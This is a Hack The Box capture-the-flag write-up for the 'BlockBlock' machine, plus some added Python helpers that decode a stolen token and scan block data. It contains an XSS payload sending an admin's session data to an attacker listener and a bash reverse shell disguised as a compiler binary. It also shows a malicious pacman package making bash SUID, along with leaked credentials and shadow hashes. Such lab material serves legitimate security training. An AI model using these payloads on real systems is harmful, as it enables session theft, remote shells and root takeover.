HTB-BlockBlock

Box Info

Difficulty Hard
OS Linux
IP Address 10.10.11.43

Port Scanning

# Check all open TCP ports
sudo rustscan 10.10.11.43 -r 1-65535 --ulimit 5000
# Nmap service/version scan with default scripts on the open TCP ports
sudo nmap 10.10.11.43 -sCV -Pn -sT -p 22,80,8545
# Nmap vulnerability scripts on the open TCP ports
sudo nmap -sT -p 22,80,8545 --script=vuln -O -Pn 10.10.11.43
# Nmap scan of the top 20 UDP ports
sudo nmap -sU --top-ports 20 -Pn 10.10.11.43

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.7 (protocol 2.0)
| ssh-hostkey:
| 256 d6:31:91:f6:8b:95:11:2a:73:7f:ed:ae:a5:c1:45:73 (ECDSA)
|_ 256 f2:ad:6e:f1:e3:89:38:98:75:31:49:7a:93:60:07:92 (ED25519)
80/tcp open http Werkzeug httpd 3.0.3 (Python 3.12.3)
|_http-title: Home - DBLC
|_http-server-header: Werkzeug/3.0.3 Python/3.12.3
8545/tcp open http Werkzeug httpd 3.0.3 (Python 3.12.3)
|_http-title: Site doesn't have a title (text/plain; charset=utf-8).
|_http-server-header: Werkzeug/3.0.3 Python/3.12.3

Update DNS

sudo nano /etc/hosts
# add the following entry
10.10.11.43 blockblock.htb

Service Enumeration

80/tcp - HTTP

Registering an account (cxk:cxk) redirects to the bot chat page.

At the bottom of the page a notice reads "You can review our smart contracts anytime" and links to http[:]//10[.]10[.]11[.]43/api/contract_source.

Opening the link returns the contract sources as JSON:

Save the response to a file and read it with jq.

Then export the two contracts to separate files:

jq -r '."Chat.sol"' contract_source.json > Chat.sol
jq -r '."Database.sol"' contract_source.json > Database.sol

XSS Vulnerability

Inspecting the HTML after login, the page's JavaScript inserts the username into the DOM without any sanitisation, which makes it vulnerable to XSS.

Looking deeper into the script, the escapeHtml function replaces only a few of the important XSS patterns. Based on that code, we can test what happens when a username query parameter is appended to the URL (?username=cxk).

It returns 401 Unauthorized, which suggests that an administrative task may visit the ?username=cxk URL. The Chat page also has an option to report a user.

XSS Payload

First, test whether the victim reaches back to the Kali host:

<img src="http://10.10.xx.xx:8088"/>

The callback shows the XSS fired, meaning a bot behind the user-report function examines the reported username.

The bot's request shows that it uses a browser to visit the page. Next, create the JavaScript payload:

payload.js

// Read the victim's /api/info response and send it, base64-encoded, to the listener
fetch('/api/info')
  .then(response => response.text())
  .then(text => {
    fetch('http://10.10.xx.xx/log?' + btoa(text), { mode: 'no-cors' });
  });

Set up an HTTP listener

python3 -m http.server 80

XSS exploit

<img src=1 onerror="this.remove(); var cxk = document.createElement('script'); cxk.src='http://10.10.xx.xx/payload.js'; document.body.appendChild(cxk);">

The listener receives a base64 string; decode it with CyberChef:

eyJyb2xlIjoiYWRtaW4iLCJ0b2tlbiI6ImV5SmhiR2NpT2lKSVV6STFOaUlzSW5SNWNDSTZJa3BYVkNKOS5leUptY21WemFDSTZabUZzYzJVc0ltbGhkQ0k2TVRjME16SXpOVGM1TVN3aWFuUnBJam9pTnpVNVpqSTJNVEF0TldZeU1pMDBNV000TFRrMlltSXRNMk15WkRjNU1tVm1NRE15SWl3aWRIbHdaU0k2SW1GalkyVnpjeUlzSW5OMVlpSTZJbUZrYldsdUlpd2libUptSWpveE56UXpNak0xTnpreExDSmxlSEFpT2pFM05ETTROREExT1RGOS4wMng3cHJSMkxNbWwtZVdsSDRTc0U2azVrZ1poLU9xNkJCMlpFNXdoM0tzIiwidXNlcm5hbWUiOiJhZG1pbiJ9Cg==

{"role":"admin","token":"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJmcmVzaCI6ZmFsc2UsImlhdCI6MTc0MzIzNTc5MSwianRpIjoiNzU5ZjI2MTAtNWYyMi00MWM4LTk2YmItM2MyZDc5MmVmMDMyIiwidHlwZSI6ImFjY2VzcyIsInN1YiI6ImFkbWluIiwibmJmIjoxNzQzMjM1NzkxLCJleHAiOjE3NDM4NDA1OTF9.02x7prR2LMml-eWlH4SsE6k5kgZh-Oq6BB2ZE5wh3Ks","username":"admin"}
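The same decoding done in Python rather than CyberChef, as an added example that is not part of the original write-up: it unpacks the exfiltrated blob above, reads the JWT claims without verifying the signature, and computes how long the stolen token stays valid (the 15-minute baseline it compares against is an assumed hardening target, not a value from the box). The token is valid for a full 7 days, which is what turns a one-shot XSS into a week of admin access.

```python
import base64
import json
from datetime import datetime, timezone

# Blob received by the listener in the write-up (base64 of the /api/info JSON).
EXFIL_B64 = "eyJyb2xlIjoiYWRtaW4iLCJ0b2tlbiI6ImV5SmhiR2NpT2lKSVV6STFOaUlzSW5SNWNDSTZJa3BYVkNKOS5leUptY21WemFDSTZabUZzYzJVc0ltbGhkQ0k2TVRjME16SXpOVGM1TVN3aWFuUnBJam9pTnpVNVpqSTJNVEF0TldZeU1pMDBNV000TFRrMlltSXRNMk15WkRjNU1tVm1NRE15SWl3aWRIbHdaU0k2SW1GalkyVnpjeUlzSW5OMVlpSTZJbUZrYldsdUlpd2libUptSWpveE56UXpNak0xTnpreExDSmxlSEFpT2pFM05ETTROREExT1RGOS4wMng3cHJSMkxNbWwtZVdsSDRTc0U2azVrZ1poLU9xNkJCMlpFNXdoM0tzIiwidXNlcm5hbWUiOiJhZG1pbiJ9Cg=="

def b64_decode(segment: str) -> bytes:
    """Decode standard or URL-safe base64, restoring any stripped padding."""
    segment += "=" * (-len(segment) % 4)
    return base64.urlsafe_b64decode(segment)

def decode_exfil(blob: str) -> dict:
    """Turn the exfiltrated base64 back into the /api/info response object."""
    return json.loads(b64_decode(blob))

def jwt_claims(token: str) -> tuple:
    """Split a compact JWS into (header, payload) WITHOUT verifying the signature.
    Inspection only: nothing here trusts or uses the token."""
    header_b64, payload_b64, _signature = token.split(".")
    return json.loads(b64_decode(header_b64)), json.loads(b64_decode(payload_b64))

def token_lifetime_seconds(payload: dict) -> int:
    """Validity window the issuer granted: exp minus iat."""
    return payload["exp"] - payload["iat"]

def assess(blob: str, max_lifetime_s: int = 15 * 60) -> dict:
    """Summarise what the stolen session token grants and for how long.
    max_lifetime_s is an assumed hardening baseline, not a value from the page."""
    info = decode_exfil(blob)
    header, payload = jwt_claims(info["token"])
    lifetime = token_lifetime_seconds(payload)
    return {
        "role": info["role"],
        "sub": payload["sub"],
        "alg": header["alg"],
        "lifetime_seconds": lifetime,
        "expires": datetime.fromtimestamp(payload["exp"], tz=timezone.utc).isoformat(),
        "too_long_lived": lifetime > max_lifetime_s,
    }

if __name__ == "__main__":
    print(json.dumps(assess(EXFIL_B64), indent=2))
```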

With the admin token, replace the token in our browser session and see what else the web application exposes.

A new Admin module is now available to explore.

The Users page lists another user, **keira**. While accessing the /admin page, the browser issues POST requests to /api/json-rpc.

JSON-RPC API

Some research shows that Ethereum nodes expose a JSON-RPC API: a uniform set of methods that applications can rely on regardless of the specific node or client implementation.

eth_getBalance returns the balance of the account at a given address.

After some testing, I found that eth_getBlockByNumber is the useful method here, since it returns the full content of any block.

Let's start with block 0x1.

The transaction data in the block looks like hex-encoded text. Let's decode it with CyberChef.

The decoded data contains keira's credentials:

keira : SomedayBitCoinWillCollapse
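The block walk above scripted, as an added example that is not part of the original write-up: it builds the eth_getBlockByNumber request the admin page sends to /api/json-rpc and scans a block response for transactions whose calldata is readable text, which is how a contract reviewer would catch secrets before they are written to a chain that everyone can read forever. The response below is constructed to match the node's reply shape; its transaction hashes are placeholders and only the readable calldata mirrors what was recovered from block 0x1.

```python
import json
import string
from typing import Optional

def rpc_request(block_number: int, request_id: int = 1) -> dict:
    """Body of an eth_getBlockByNumber call; True requests full transaction objects."""
    return {"jsonrpc": "2.0", "method": "eth_getBlockByNumber",
            "params": [hex(block_number), True], "id": request_id}

def decode_input(hex_data: str) -> Optional[str]:
    """Return the calldata as text when it is readable UTF-8, otherwise None."""
    raw = bytes.fromhex(hex_data[2:] if hex_data.startswith("0x") else hex_data)
    if not raw:
        return None
    try:
        text = raw.decode("utf-8")
    except UnicodeDecodeError:
        return None          # genuine ABI-encoded calldata or bytecode lands here
    printable = sum(ch in string.printable for ch in text) / len(text)
    return text if printable > 0.95 else None

def plaintext_in_block(block_response: dict) -> list:
    """(tx hash, decoded text) for every transaction whose calldata is readable text."""
    found = []
    for tx in block_response["result"]["transactions"]:
        text = decode_input(tx.get("input", "0x"))
        if text is not None:
            found.append((tx["hash"], text))
    return found

# Constructed sample reply in the node's response shape (not the box's real data):
# placeholder hashes, one text payload like the one found in block 0x1, one bytecode tx.
SAMPLE_RESPONSE = {
    "jsonrpc": "2.0", "id": 1,
    "result": {"number": "0x1", "transactions": [
        {"hash": "0x" + "11" * 32,
         "input": "0x" + "keira : SomedayBitCoinWillCollapse".encode().hex()},
        {"hash": "0x" + "22" * 32, "input": "0x60806040"},  # EVM prologue, not text
    ]},
}

if __name__ == "__main__":
    print(json.dumps(rpc_request(1)))
    for tx_hash, text in plaintext_in_block(SAMPLE_RESPONSE):
        print(f"{tx_hash[:10]}... {text}")
```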

Initiate User Foothold

Access as keira

Validate the SSH access:

nxc ssh blockblock.htb -u keira -p SomedayBitCoinWillCollapse

ssh keira@blockblock.htb

User Flag

Privilege Escalation

sudo privileges

keira can run forge as the paul user through sudo without a password. Let's check what forge is:

sudo -u paul /home/paul/.foundry/bin/forge

Foundry Book

From the documentation, forge build accepts a --use <SOLC_VERSION> option, which can also be given the path to a solc binary.

sudo -u paul /home/paul/.foundry/bin/forge build -h

Keira to Paul

To abuse forge build, first create a new project; the build step is abused afterwards.

# Create a throwaway Foundry project as paul
sudo -u paul /home/paul/.foundry/bin/forge init /dev/shm/exploit --no-git --offline
# Create reverse shell script that will stand in for the solc binary
echo -e '#!/bin/bash\nbash -i >& /dev/tcp/10.10.xx.xx/9001 0>&1' > /dev/shm/solc
cd /dev/shm/exploit
chmod +x ../solc

Exploit

# On KALI start the listener
rlwrap nc -lvnp 9001

# Back on the victim server, execute
sudo -u paul /home/paul/.foundry/bin/forge build --use ../solc

sudo privileges

The output shows that paul does not need a password to run pacman.

Initiate Root Foothold

Exploiting pacman to Get Root Access

Create a malicious package:

cd /dev/shm
# Minimal PKGBUILD with an install scriptlet
echo -e "pkgname=exp\npkgver=1.0\npkgrel=1\narch=('any')\ninstall=exp.install" > PKGBUILD
# post_install runs as root when the package is installed
echo "post_install() { chmod 4777 /bin/bash; }" > exp.install
makepkg -s

Abuse pacman to install the malicious package:

sudo /usr/bin/pacman -U exp-1.0-1-any.pkg.tar.zst

Run the now SUID bash:

bash -p

Root flag

Shadow

root:$y$j9T$aS1WjBeHOMsj5JDGpOSTR0$eEn9e2kIqFfcRCf79xQw7iLDJbt/ioE793tqS3GnjsC:19878::::::
keira:$y$j9T$XXkQ9ogGKlThyrI.mItx80$eMiwlviC0FB/bu5tWtoc.DpedzwUnOwETzmlPf6ZuC8:19878:0:99999:7:::
paul:$y$j9T$milm8la5tGGIhUazNYV3k.$lsAle1Ny3lNaIzStej/8qsKj/1wSgaoi15f/u5Ky/h9:19878:0:99999:7:::